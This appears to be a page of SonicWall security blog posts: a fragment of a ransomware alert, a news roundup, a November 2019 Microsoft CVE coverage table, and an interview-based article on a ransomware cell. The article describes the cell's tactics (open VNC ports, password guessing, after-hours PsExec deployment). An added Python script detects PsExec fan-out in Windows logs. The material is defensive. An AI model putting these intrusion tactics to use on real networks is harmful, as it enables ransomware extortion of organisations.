After encrypting the personal documents, the ransomware shows the following text file, which states that the computer's files have been encrypted and tells the victim to contact the developer for unlock instructions.

 

The ransom note contains instructions to visit a .onion website, a page hosted on the Tor network, in order to decrypt the files:

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: ANTEFRIGUS.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cyber Security News & Trends

This week, SonicWall meets a Russian ransomware cell, the first 2020 cyber-predictions are coming in, and cybersecurity has a color.


SonicWall Spotlight

Mindhunter: Meeting a Russian Ransomware Cell – SonicWall Webinar

  • On November 19, SonicWall will proudly present Mindhunter: my two-week conversation with a ransomware cell. Join SonicWall security expert Brook Chelmo as he gives you an inside look into the human-side of a modern ransomware cell, their advice on how to stop them from infiltrating your organization, encrypting your endpoints, and spreading to other drives and segments of your network.

Retail’s Weakness Is Cyber Crime’s Opportunity – Retail Technology Review

  • The festive shopping season is about to kick off with Black Friday 2019. Writing in Retail Technology Review, SonicWall CEO Bill Conner details the size and scale of cyberattacks over the same period last year and offers retailers advice on how best to protect themselves.

Attack on Labour Shows Need for DDoS Defence but Should Alarm Few – Computer Weekly (UK)

  • The UK Labour party’s website suffered a DDoS attack this week. While Cloudflare successfully prevented any major damage from occurring, the attack acts as a reminder that modern election campaigns need to ensure that their cybersecurity is prepared for anything. SonicWall’s Terry Greer-King provides commentary.

Cybersecurity News

Predictions 2020: This Time, Cyberattacks Get Personal – ZDNet

  • The first cyber predictions for 2020 have started rolling in. Initial contenders include the weaponizing of mergers and acquisitions data, deepfake scams, and the closing off of AI and Machine Learning data from outsiders.

Breach Affecting 1 Million Was Caught Only After Hacker Maxed out Target’s Storage – Ars Technica

  • A hacker breached an IT provider in May 2014, stealing data and building an archive on the provider's own server that went unnoticed for almost two years. The breach was only noticed in 2016 when the hacker's archive grew so large that the server ran out of disk space. The company has now been fined for failing to detect the breach.

Cybersecurity: Why More Needs to Be Done to Help Older People Stay Safe Online – ZDNet

  • Internet users are no longer just the young or the most technologically up-to-date. ZDNet argues that not enough is being done to protect less tech-savvy elderly people online.

As 5G Rolls out, Troubling New Security Flaws Emerge – Wired

  • 5G is entering use in major urban domains worldwide, and its uptake is likely only to increase rapidly. Despite this, major security vulnerabilities continue to be found, including 11 design flaws in a single recent study.

Cybersecurity Is an Asset, Not a Nuisance – Forbes

  • Forbes argues that a good way to think about cybersecurity is not as a nuisance but like the braking system on a race car. Without it, the potential top speed of the car would be considered reckless.

The Time to Tackle Cybersecurity in Self-Driving Cars is Now – Newsweek

  • Upcoming self-driving cars contain a myriad of computers connected both to each other and to many external networks. With cyberattacks a constant threat to systems worldwide, Newsweek argues that cybersecurity should be integral to the very design of cars from the ground up, not as an add-on at a later point.

And Finally

What Color Is Cybersecurity? – Forbes

  • A new large-scale study into how cybersecurity is talked about and advertised online has found the color code #235594 to be dominant in imagery.

In Case You Missed It

Microsoft Security Bulletin Coverage for November 2019

SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft's security advisories for the month of November 2019. A list of the issues reported, along with SonicWall coverage information, follows:

CVE-2018-12207 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0712 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2019-0719 Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0721 Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-11135 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1234 Azure Stack Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2019-1309 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2019-1310 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2019-1324 Windows TCP/IP Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1370 Open Enclave SDK Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1373 Microsoft Exchange Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1374 Windows Error Reporting Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1379 Windows Data Sharing Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1380 Microsoft splwow64 Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1381 Microsoft Windows Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1382 Microsoft ActiveX Installer Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1383 Windows Data Sharing Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1384 Microsoft Windows Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-1385 Windows AppX Deployment Extensions Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1388 Windows Certificate Dialog Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1389 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1390 VBScript Remote Code Execution Vulnerability
IPS 14574:VBScript Remote Code Execution Vulnerability (NOV 19) 1
CVE-2019-1391 Windows Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2019-1392 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1393 Win32k Elevation of Privilege Vulnerability
ASPY 5844:Malformed-File exe.MP.113
CVE-2019-1394 Win32k Elevation of Privilege Vulnerability
ASPY 5844:Malformed-File exe.MP.113
CVE-2019-1395 Win32k Elevation of Privilege Vulnerability
ASPY 5844:Malformed-File exe.MP.113
CVE-2019-1396 Win32k Elevation of Privilege Vulnerability
ASPY 5844:Malformed-File exe.MP.113
CVE-2019-1397 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1398 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1399 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2019-1402 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1405 Windows UPnP Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1406 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1407 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1408 Win32k Elevation of Privilege Vulnerability
ASPY 5844:Malformed-File exe.MP.113
CVE-2019-1409 Windows Remote Procedure Call Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1411 DirectWrite Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1412 OpenType Font Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1413 Microsoft Edge Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-1415 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1416 Windows Subsystem for Linux Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1417 Windows Data Sharing Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1418 Windows Modules Installer Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1419 OpenType Font Parsing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1420 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1422 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1423 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1424 NetLogon Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-1425 Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1426 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2019-1427 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2019-1428 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2019-1429 Scripting Engine Memory Corruption Vulnerability
ASPY 5843:Malformed-File html.MP.82
CVE-2019-1430 Microsoft Windows Media Foundation Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1432 DirectWrite Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1433 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1434 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1435 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5839:Malformed-File exe.MP.109
CVE-2019-1436 Win32k Information Disclosure Vulnerability
ASPY 5840:Malformed-File exe.MP.110
CVE-2019-1437 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5841:Malformed-File exe.MP.111
CVE-2019-1438 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5842:Malformed-File exe.MP.112
CVE-2019-1439 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1440 Win32k Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1441 Win32k Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1442 Microsoft Office Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-1443 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1445 Microsoft Office Online Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2019-1446 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1447 Microsoft Office Online Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2019-1448 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1449 Microsoft Office ClickToRun Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-1456 OpenType Font Parsing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1457 Microsoft Office Excel Security Feature Bypass
There are no known exploits in the wild.

Meeting a Russian Ransomware Cell

Ransomware is one of the most notorious and effective types of cyberattacks in the last decade. And I had the opportunity to go inside the minds that operate a real-world ransomware cell.

It starts with the young leader — nicknamed “Twig” — of a Russian ransomware cell. After two weeks of chatting through a secure channel, what I found was very interesting.

On social media, some cybersecurity firms like to portray him in black hoodies with leather gloves and a backdrop of matrix-style digits. They name-drop buzzwords like advanced-generation V attacks and other trumped-up terms, which could be more fitting for nation-state attacks, but this isn’t the case with most hacking groups.

Carrying out successful ransomware attacks typically only requires a mixture of scripts, common vulnerabilities, brute-force efforts, bad IT policies at target organizations, and generations of frustration between eastern and western politics.

MINDHUNTER

On-Demand Webinar: My Two-Week Conversation with a Ransomware Cell

Join SonicWall security expert Brook Chelmo as he gives you an inside look into the human-side of a modern ransomware cell, their advice on how to stop them from infiltrating your organization, encrypting your endpoints, and spreading to other drives and segments of your network.

How does a ransomware attack work?

The number of organizations and verticals targeted each week, and the demands they make on the compromised device(s), are all private. Twig, however, is open to saying that their attack style is generally through spear-phishing and port-scanning for common vulnerabilities.

Twig’s favorite ports are “5900 and 5901 which are open and unpassworded.” Together, these two ports rank as the 19th most-scanned port. They are used by virtual network computing (VNC), the desktop-sharing and remote-control application for Linux and Windows machines.

Over the years, several vulnerabilities related to these ports have allowed attackers to bypass authentication and gain access to the system. If Twig can get in, then your participation isn’t even required to activate the ransomware script (e.g., enable macros on a malicious Word document received in email). In fact, SonicWall research shows that anywhere between 17% and 20% of all malware attacks come through non-standard ports.

While Twig’s scripts are pinging a range of IP addresses for vulnerabilities, he runs a PHP script alongside unnamed services that spam targets to gain remote access to their systems.

HILDACRYPT, for example, uses file extensions that are not normally scanned, such as .vbox, to evade inspection and detection by firewalls or email security services. Once access has been granted, he will log in after-hours and run a batch file through PsExec throughout the entire network to make it “go boom.”

Or, in less dramatic words, to “make Hilda run on the entire network.” It’s the same headache caused by the likes of WannaCry, NotPetya and SamSam ransomware strains, the infamous attack wave from three years ago. Since admins tend to have access to multiple drives — and sometimes read/write ability on endpoints via access manager roles — exploiting them is critical to mission success.
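The after-hours PsExec fan-out Twig describes leaves a trace defenders can correlate: every PsExec session installs a service on the target host, which Windows records as System Event ID 7045. The following is an added example, not code from the original post or from SonicWall, that flags that pattern over constructed log lines; the record layout, the business-hours policy and the thresholds are assumptions.

```python
from datetime import datetime

# Constructed sample of Windows System log records (Event ID 7045, "A service
# was installed in the system"), flattened as timestamp|host|event_id|service|image.
# The layout is assumed for this example; a real log exporter will differ.
SAMPLE_LOG = """\
2019-11-12T02:03:11|FS01|7045|PSEXESVC|%SystemRoot%\\PSEXESVC.exe
2019-11-12T02:03:14|FS02|7045|PSEXESVC|%SystemRoot%\\PSEXESVC.exe
2019-11-12T02:03:20|WS-ACCT07|7045|PSEXESVC|%SystemRoot%\\PSEXESVC.exe
2019-11-12T02:03:25|DC01|7045|PSEXESVC|%SystemRoot%\\PSEXESVC.exe
2019-11-12T14:10:02|WS-IT03|7045|PSEXESVC|%SystemRoot%\\PSEXESVC.exe
2019-11-12T09:00:00|WS-IT03|7045|Backup Agent|C:\\Program Files\\Backup\\agent.exe
"""

BUSINESS_HOURS = range(8, 18)  # 08:00-17:59 counts as business hours (assumed policy)
WINDOW_SECONDS = 300           # how close together installs must be to count as fan-out
MIN_HOSTS = 3                  # distinct hosts inside one window before alerting


def parse_events(text):
    """Parse the pipe-delimited records into dicts with a real datetime."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, host, event_id, service, image = line.split("|", 4)
            events.append({"ts": datetime.fromisoformat(ts), "host": host,
                           "event_id": int(event_id), "service": service, "image": image})
    return events


def psexec_installs(events):
    """7045 events carrying PsExec's default service name. Caveat: PsExec run with
    -r registers a different name, so pair this with image-path or hash checks."""
    return [e for e in events
            if e["event_id"] == 7045 and e["service"].upper() == "PSEXESVC"]


def after_hours_fanout(events):
    """Hosts hit by PSEXESVC installs outside business hours where at least
    MIN_HOSTS distinct hosts appear within WINDOW_SECONDS of each other."""
    hits = [e for e in psexec_installs(events) if e["ts"].hour not in BUSINESS_HOURS]
    hits.sort(key=lambda e: e["ts"])
    flagged = set()
    for i, start in enumerate(hits):
        window = [e for e in hits[i:]
                  if (e["ts"] - start["ts"]).total_seconds() <= WINDOW_SECONDS]
        hosts = {e["host"] for e in window}
        if len(hosts) >= MIN_HOSTS:
            flagged |= hosts
    return sorted(flagged)


if __name__ == "__main__":
    print(after_hours_fanout(parse_events(SAMPLE_LOG)))  # ['DC01', 'FS01', 'FS02', 'WS-ACCT07']
```

The daytime install on WS-IT03 is left alone; the point is the burst of installs across many hosts when nobody is supposed to be working.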


Once systems are compromised, they don’t exfiltrate the files and sell the data like some do. They just set the demand and wait.

Initially, they asked victims to watch the Hilda series on Netflix (yes, really), join their Discord server for support, then pay the stated ransom amount in bitcoin (a popular way to couch the demand).

What can you do to stop ransomware attacks?

First of all, Twig says to “use proper passwords” for ransomware protection. He said many passwords are either written by the ‘crazy or the lazy.’ Most of them are too simple and are often guessed by his scripts. His favorite story was when he found a password to be two quotation marks. I guess the administrator thought it was too simple to guess. Well, he was wrong and had to pay for it.

Second, he said “write your programs in a real programming language.” He said that real programmers write in C or C++, and that Java or PHP is for the lazy and stupid (an opinion not shared by all professional programmers).

When he sees programs written in Java, he feels he is dealing with a non-qualified individual and, therefore, an easy target. It is also worth noting that some security professionals advise not to program in C when it comes to security.

Third, he casts shade on Americans and tech workers over the age of 35, either because of his belief in their lack of modern skills or their lack of energy to do the job properly. He says organizations should hire qualified people who can both code and understand security. If he were in charge of hiring at your company, and didn’t discriminate by age or nationality, he would hire people who hold qualifications in C or C++ and have the energy to follow security best practices.

Misconfigured firewalls leave doors open for ransomware attacks

Finally, Twig points out that misconfigured firewalls are his best friend. In fact, he has strong opinions for some firewall makers that enable him “to uninstall [the firewall] from the computer.” In the case of network firewalls, misconfigurations are easily done and can be one’s downfall. It happens more than you think.

In the case of endpoint firewalls, end-users should be under the principle of least privilege (POLP), which means they will have just enough rights to do their job and without the ability to modify their endpoints. In 2016, Microsoft reported that 94% of critical vulnerabilities can be mitigated by removing administrative rights from users.

Four ways SonicWall stops ransomware attacks

Stopping ransomware attacks isn’t always easy. A conversation with Twig makes that apparent. But he also highlights that if you follow best practices and implement security across different layers, ransomware attacks won’t be nearly as successful. Leverage the four key ways SonicWall helps organizations block ransomware attacks — automatically and in real time.

  • Deploy a firewall and keep security services active. Firewall vendors like SonicWall are now security platform providers that protect the traffic to and from branches (SD-WAN), and examine traffic through the firewall with gateway antivirus to stop known versions of malware. It’s also smart to leverage Intrusion Prevention Services (IPS) to identify known communication patterns within malware and stop what it wants to do, like travel laterally to other drives or networks. The combination of gateway security and IPS was critical in stopping WannaCry ransomware attacks for SonicWall customers on Day 1.
  • Block unknown ransomware with a sandbox. All of the updated WannaCry versions that came after Version 1 were blocked automatically by the Capture Advanced Threat Protection (ATP) sandbox, which catches variants a customer encounters before SonicWall can create a definition/signature to block them on firewalls and email security.
  • Protect your inbox. To make it even more difficult to attack your network or users, use secure email solutions to block spoofed emails and examine attachments within all email to look for malware. Email is still highly effective at getting malware exploits onto your network.
  • Secure your endpoints. Finally, protect your endpoints with a next-generation anti-virus (NGAV). For example, Capture Client will help stop intrusions and ransomware attacks from initiating. Even if a ransomware strain did execute, Capture Client would give the administrator the ability to roll back the damage to a previously known clean state.

For the full story on my chats with Twig, I urge you to attend my upcoming webinar, “Mindhunter: My Two-Week Conversation with a Ransomware Cell.”